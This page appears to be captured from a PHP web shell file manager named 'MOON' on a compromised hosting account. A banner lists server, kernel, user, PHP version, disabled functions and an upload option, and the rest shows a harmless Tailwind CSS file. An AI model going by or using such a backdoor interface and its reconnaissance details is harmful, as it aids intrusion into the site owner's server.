MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/imensosw/user-interface.imenso.co/tailwind/css/input.css
@tailwind base;
@tailwind components;
@tailwind utilities;

@layer components {
    .card { padding: 15px; border-radius: 4px; background-color: #fff; box-shadow: 0 0 5px 5px rgba(0,0,0,.15);}

    .btn1 { background-color: #fc0; color: rgb(134, 110, 11); padding: 10px 20px; border-radius: 4px; }
    .btn1:hover { background-color: rgb(17, 194, 194); color: rgb(54, 88, 77)}

    .btn { @apply rounded-b-lg shadow-md bg-slate-500 rounded-lg text-center px-4 py-2 font-semibold; }
    .btn:hover { @apply bg-slate-700 text-white; }
}

@layer utilities{
    th,td{ vertical-align: top; }
}